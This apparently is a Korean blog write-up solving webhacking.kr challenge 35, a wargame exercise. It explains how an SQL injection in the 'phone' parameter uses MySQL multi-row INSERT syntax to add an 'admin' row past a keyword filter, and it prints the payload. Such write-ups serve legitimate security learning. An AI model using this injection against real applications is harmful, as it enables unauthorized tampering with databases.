phone과 id를 GET방식으로 전달받음
필터링
phone에서
| * | / | = | select | - | # | ; |
id에서
id값이 5글자보다 많으면 안됨
admin이 포함되면 안됨
쿼리문
insert into chall35(id,ip,phone) values('id','아이피',phone)
이게 우리가 날리는 쿼리이고
select ip from chall35 where id='admin' and ip='내 아이피'
이 쿼리로 나오는 값이 내 ip와 같다면
클리어
mysql에서 한번에 insert를 여러개 할 수 있음
insert into 테이블명(컬럼1, 컬림2) values('값1', '값2'), ('값1', '값2'), ('값1', '값2')
그래서 id값은 그대로 두고 phone에서 injection한다
id에는 guest가 들어감
phone에서
1,),('admin','내 ip', 123
이렇게 값을 준다면 날리는 쿼리문은
insert into chall35(id,ip,phone) values('guest', '내 ip', 1),('admin', '내 ip', 123)
이렇게 되서 추가되는 데이터가 2개가 됨
'Wargame, CTF > webhacking.kr' 카테고리의 다른 글
| Webhacking.kr 29번 (0) | 2019.12.20 |
|---|---|
| Webhacking.kr 53번 (0) | 2019.12.13 |
| Webhacking.kr 49번 (0) | 2019.12.09 |
| Webhacking.kr 46번 (0) | 2019.12.09 |
| Webhacking.kr 32번 (0) | 2019.12.06 |
